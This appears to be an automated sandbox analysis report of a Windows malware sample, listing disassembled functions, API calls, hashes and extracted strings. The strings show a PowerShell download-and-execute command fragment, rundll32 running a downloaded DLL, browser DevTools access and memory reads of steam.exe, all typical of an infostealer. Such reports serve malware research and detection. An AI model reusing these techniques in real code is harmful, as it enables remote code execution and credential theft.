                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcpy$lstrcat$??3@InternetOpenmemchrmemcmpmemmovememsetstrlen
                                                                                                                                                                                                                                                                                • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                • API String ID: 2141826376-2676143373
                                                                                                                                                                                                                                                                                • Opcode ID: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                • Instruction ID: 91c73b424bc1f2f560fb80e69d34ff2093765c111021dba20f9d1d410260af79
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8731C9719002185BEB14AB65DC49BEFB775AF41308F41006EF506772C2DB7C1A85CBA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • ShellExecuteEx.SHELL32(?), ref: 00412560
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteShellSystemTimememset
                                                                                                                                                                                                                                                                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                • API String ID: 1675527290-38637897
                                                                                                                                                                                                                                                                                • Opcode ID: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                • Instruction ID: 334dd5afd32dd1eb1b8252b2cfcba07153a0a01eb84f6ed827c6dd8a75e550bd
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6418A303103146BD654BB6299A6BAF7A595BC4758F40045E784B1F283CEBC5CC5C7EE
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411E21
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00411E3C
                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411E4B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process$Heap$AllocCloseHandleOpenTerminatewsprintf
                                                                                                                                                                                                                                                                                • String ID: %hs
                                                                                                                                                                                                                                                                                • API String ID: 2756667156-2783943728
                                                                                                                                                                                                                                                                                • Opcode ID: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                • Instruction ID: 5d8af7fbd58c0c14971e09abe29c4d5a15048916ed38c030ba04a2c092a42a15
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E731C130608341ABD3109F60ED48BAFB7E9EFD5744F00591EF985821A0EB7499C4CA5B
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F899
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F8D6
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00064000,00000000,?,?,00000000), ref: 0040FB5E
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strlen$MemoryProcessQueryReadVirtualmemset
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3741619940-0
                                                                                                                                                                                                                                                                                • Opcode ID: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                • Instruction ID: 5f3e5458c0cb4e82bdfb47d3dacbfc32efe29669a25e4631f25e2303d30cacff
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0A159716083018BD328DF24D891A3BB7E2FF94704F14893EE58697791E738E849CB5A
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • ShellExecuteEx.SHELL32(?), ref: 00412374
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internetlstrcpy$CloseFileHandle$Openlstrcatlstrlen$CreateExecuteReadShellSystemTimeWritememset
                                                                                                                                                                                                                                                                                • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                • API String ID: 1030512983-3594953769
                                                                                                                                                                                                                                                                                • Opcode ID: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                • Instruction ID: 94f81c9545e4cc3746d51ce8cbcf5f5300d4dbcdb4f20de0f2bf9a4aeae790fb
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87815170A0021857DB14FBB2CDEAAEF7B69AF44748F40145EB4066B182DEBC5DC5C7A8
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041D5E3
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041D611
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041D647
                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D653
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D66F
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D6D8
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$File$PointerSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3240274019-0
                                                                                                                                                                                                                                                                                • Opcode ID: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                • Instruction ID: 199ab82a49c152330d2498684869e6748a8235d6c4fc3d2a3f6766ec5b303acd
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8410EB1904705AED324CF25C845B7BBBE8FF84348F108A2EF5D69A291E774E486CB14
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                • String ID: %d/%d/%d %d:%d:%d
                                                                                                                                                                                                                                                                                • API String ID: 1243822799-1073349071
                                                                                                                                                                                                                                                                                • Opcode ID: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                • Instruction ID: a51e7d71a8269122c591f01167c988a4a4a74b4f43d1a07cc1a506d8f3a3d197
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CF0E9619042207BE300175ADC49D3BB7ECEFC5B66F00450AF9C8861C0E2755C60C3F1
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • memchr.MSVCRT ref: 0040F7F6
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F884
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_., xrefs: 0040F7A8
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@_invalid_parameter_noinfo_noreturnmemchrmemmove
                                                                                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
                                                                                                                                                                                                                                                                                • API String ID: 1808541760-3714209346
                                                                                                                                                                                                                                                                                • Opcode ID: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                • Instruction ID: e5761b3670b8c8960a25c8c0341e9f71b1cf11a4bb1c116d5b70eba03c88b707
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9931E4326043014BD734EE28998476BB6E5EF81314F54493EF8926B7C2D378DC48879A
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strtok_s
                                                                                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                                                                                • API String ID: 3330995566-2343686810
                                                                                                                                                                                                                                                                                • Opcode ID: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                • Instruction ID: 7cbb43b9c3c311997e94ccc4c59da73614e136a49788afc63ea09a6e546b0ca8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F721D7741403099BD734DB21ED44BAB7365FB80308F04891ED91647741E77DE9AAC6A5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411ED0: StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FD50: strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,steam.exe), ref: 004100BF
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,steam.exe), ref: 004100D1
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@ProcessProcess32$CreateFirstMemoryNextOpenReadSnapshotToolhelp32_invalid_parameter_noinfo_noreturnmemsetstrcpystrlen
                                                                                                                                                                                                                                                                                • String ID: steam.exe
                                                                                                                                                                                                                                                                                • API String ID: 3498801153-2826358650
                                                                                                                                                                                                                                                                                • Opcode ID: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                • Instruction ID: c95efb34c5d0572b28db4c51e5027ad35194888a113b08cfb57a14cf0263e5e6
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F0F9B1A003082BEA10753A7CC5AFB7948DA55758F040537FD5597342F59B8CD402BA
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041D784
                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D78E
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D7A9
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D80E
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                • Opcode ID: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                • Instruction ID: 931dc2256524a03f6c6b52008fe1b6fe3cfd9aca74429015198684bf78445e10
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0318BB2904B109AE329CF29C8547B7BBE4FF84340F008A2EF5D69A250E779E485DB55
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 004113C9
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890